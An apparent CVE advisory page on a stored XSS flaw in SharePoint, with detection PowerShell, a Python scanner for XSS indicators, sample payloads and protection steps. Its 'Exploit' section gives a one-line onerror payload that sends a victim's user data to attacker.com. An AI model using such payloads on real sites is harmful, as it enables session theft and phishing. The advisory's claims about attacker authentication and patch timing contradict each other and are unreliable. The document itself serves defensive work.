Microsoft Office SharePoint, Cross-site Scripting (XSS), CVE-2026-47639 (Medium) -DC-Jun2026-362

CVE-2026-47639 is a cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint that stems from improper neutralization of user-controlled input during web page generation. The core issue is a classic CWE-79: user-supplied data is not sanitized or encoded before being embedded into a SharePoint page that is later served to other authenticated users.
An attacker who is already authorized to edit SharePoint content (e.g., a site contributor or administrator) can craft a malicious payload – typically HTML with embedded JavaScript – and inject it into a web part, column value, or rich‑text field. When a victim user with appropriate privileges visits the compromised page, the payload executes in the victim’s browser context. Because the payload runs under the same origin as the legitimate SharePoint site, it can read and manipulate page elements, session tokens, and cookies.
The exploitation chain does not require authentication of the victim, but it does need user interaction (UI:R) – the victim must click on a deceptive link or open a specially crafted SharePoint page. The network attack vector (AV:N) means the malicious page can be delivered over the internet or intranet without physical access.
The injected script can spoof entire page sections, such as replacing a legitimate file download button with a fraudulent one that points to a credential harvester, or altering a document library view to display fake “verify account” forms. Because SharePoint’s trust model treats the page as authentic, victims are far more likely to enter sensitive information.
The vulnerability affects at least SharePoint Server Subscription Edition and versions 16.0.5548.1003 / 16.0.5552.1002. No public exploit or active in‑the‑wild exploitation has been confirmed, but the flaw is easy to exploit remotely and does not require authentication of the attacker (PR:N). A fix is available by upgrading to version 16.0.5556.1005 or applying the June 2026 cumulative update.

DailyCVE Form:

Platform: Microsoft SharePoint
Version: Server 2016/2019/Subscription
Vulnerability: Stored XSS Spoofing
Severity: Medium (CVSS 5.4)
Date: 2026-06-09

Prediction: Patch expected 2026-06-10

What Undercode Say:

Check the current SharePoint build (compare it with the fixed build named above)
Get-SPFarm | Select BuildVersion
Find web parts that can carry contributor-supplied markup (Content Editor / Script Editor) on every site page
Get-SPWebApplication | Get-SPSite -Limit All | Get-SPWeb -Limit All | ForEach-Object {
    $web = $_; $lib = $web.Lists.TryGetList("Site Pages")
    if ($lib) { foreach ($item in $lib.Items) {
        $wpm = $web.GetLimitedWebPartManager($item.Url, [System.Web.UI.WebControls.WebParts.PersonalizationScope]::Shared)
        $wpm.WebParts | Where { $_.GetType().Name -match "ContentEditor|ScriptEditor" } | Select @{n="Page";e={$item.Url}}, Title
    } }
}
Search page files on disk for inline event handlers (customized pages live in the content database, not on disk, so also run the list query below)
findstr /s /i "onclick onload javascript: alert" C:\inetpub\wwwroot\wss\VirtualDirectories\*.aspx
Enumerate all pages created by a suspicious user (replace "attacker" with the account's display name)
Get-SPSite -Limit All | Get-SPWeb -Limit All | Select -ExpandProperty Lists | Where { $_.Title -eq "Pages" -or $_.Title -eq "Site Pages" } | ForEach-Object { $_.Items } | Where { $_["Author"] -like "*attacker*" } | Select Url
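A stricter version of the inline-handler search above, added here as an example and not part of the advisory: rather than a keyword grep over the web root, it parses each exported field value and reports only script-bearing tags, on* handlers and script-scheme URLs. The scanner class, the scan_html/scan_fields names and the sample field values are constructed for this example.

```python
import re
from html.parser import HTMLParser

# Attributes that take a URL and can therefore smuggle a javascript: scheme.
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href"}
SCRIPT_SCHEME = re.compile(r"^(javascript|vbscript):", re.I)


class XssIndicatorScanner(HTMLParser):
    """Collects (tag, attribute, value) triples that contributor-authored rich
    text should never contain. html.parser lowercases names and decodes
    character references first, so oNeRrOr and &#106;avascript: are caught."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe", "object", "embed"):
            self.findings.append((tag, None, None))
        for name, value in attrs:
            if name.startswith("on"):                      # inline event handler
                self.findings.append((tag, name, value))
            elif name in URL_ATTRS and value:
                # Browsers drop tabs/newlines inside a URL, so "java\tscript:"
                # still runs; normalise the same way before testing the scheme.
                probe = re.sub(r"[\s\x00-\x1f]", "", value)
                if SCRIPT_SCHEME.match(probe):
                    self.findings.append((tag, name, value))


def scan_html(fragment: str) -> list:
    """Return the indicator triples found in one rich-text / web-part value."""
    scanner = XssIndicatorScanner()
    scanner.feed(fragment)
    scanner.close()
    return scanner.findings


# Constructed sample field values, standing in for an export of Pages / list
# item contents pulled from the farm with the cmdlets above.
SAMPLE_FIELD_VALUES = {
    "benign": '<p>Quarterly <b>report</b>: <a href="/sites/hr/Report.pdf">PDF</a></p>',
    "event_handler": '<img src=x onerror="alert(document.domain)">',
    "js_uri": '<a href="&#106;ava\tscript:alert(1)">Verify account</a>',
    "script_tag": '<div><script>document.title = "spoofed"</script></div>',
}


def scan_fields(fields: dict) -> dict:
    """Map field name -> findings, keeping only fields that have any."""
    return {name: hits for name, val in fields.items() if (hits := scan_html(val))}
```

Feed scan_fields the field values returned by the enumeration cmdlets; any non-empty entry is a page to inspect before the patch is applied.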

Exploit:

An authenticated attacker with edit rights creates a SharePoint list item containing a payload like <img src=x onerror="fetch('/_api/web/currentuser').then(r=>r.json()).then(data=>fetch('https://attacker.com/steal?d='+btoa(JSON.stringify(data))))">. When any victim views the list via a web part, the script exfiltrates the victim’s user context and session tokens.

Protection:

  • Upgrade to SharePoint Server version 16.0.5556.1005 or apply the June 2026 cumulative security update.
  • Enforce Content Security Policy (CSP) headers to block inline script execution.
  • Disable custom script on site collections (Set-SPSite -Identity <site-collection-url> -DenyAddAndCustomizePages 1).
  • Use Microsoft Defender for Office 365 to scan SharePoint lists for malicious payloads.

Impact:

An attacker can spoof SharePoint interface elements, trick users into revealing credentials, steal NTLM hashes or session cookies, and perform social‑engineering attacks – all while the victim believes they are interacting with a legitimate corporate portal.

Sources:

Reported By: nvd.nist.gov